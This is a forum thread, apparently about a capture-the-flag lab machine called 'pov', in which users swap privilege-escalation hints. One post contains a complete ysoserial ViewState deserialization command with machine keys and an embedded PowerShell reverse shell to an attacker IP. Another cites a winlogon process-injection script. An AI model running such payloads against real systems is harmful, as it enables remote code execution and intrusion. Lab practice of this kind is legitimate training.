Posts: 31
Threads: 0
Joined: Oct 2023
Where did you search, and found it? I find nothing like a hash or a password. This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 2
Threads: 0
Joined: Jan 2024
I'm also stuck with the payload...
.\ysoserial.exe --generator="8E0F0FA3" -p ViewState -g TextFormattingRunProperties -c "New-Object System.Net.Sockets.TCPClient('10.10.x.x',9998);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"
Posts: 10
Threads: 0
Joined: Oct 2023
I use https://github.com/decoder-it/psgetsyste...getsys.ps1 script to inject process inside winlogon. However, I get error code: ERROR_INSUFFICIENT_BUFFER
122 (0x7A)
The data area passed to a system call is too small.
I see process is being created but exits immediately.
winlogon has no enough memory to start cmd.exe? It's super weird.
Posts: 10
Threads: 0
Joined: Jan 2024
PS C:\> whoami
pov\alaading
PS C:\> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeDebugPrivilege Debug programs Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
no SeDebugPrivilege priv, why is that
Posts: 10
Threads: 0
Joined: Jan 2024
(Jan 28, 2024, 02:39 AM)ConnorDev Wrote: (Jan 28, 2024, 02:36 AM)eclipse Wrote: PS C:\> whoami
pov\alaading
PS C:\> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeDebugPrivilege Debug programs Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
no SeDebugPrivilege priv, why is that
Same here. There is no SeDebugPrivilege
 so any hint guys
Posts: 31
Threads: 0
Joined: Oct 2023
I can not find a way to become alaading, can someone give me a hint This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 5
Threads: 0
Joined: Jan 2024
People, how did you get alaading user?
Posts: 10
Threads: 0
Joined: Jan 2024
(Jan 28, 2024, 02:42 AM)query1338 Wrote: I can not find a way to become alaading, can someone give me a hint
Find a credential file and use it to invoke a reverse shell as this user
Posts: 5
Threads: 0
Joined: Jan 2024
(Jan 28, 2024, 02:44 AM)eclipse Wrote: (Jan 28, 2024, 02:42 AM)query1338 Wrote: I can not find a way to become alaading, can someone give me a hint
Find a credential file and use it to invoke a reverse shell as this user
OK, I have encrypted password but i don't know how i can use it
Posts: 10
Threads: 0
Joined: Jan 2024
any hint for root ??
no SeDebugPrivilege priv still...
|
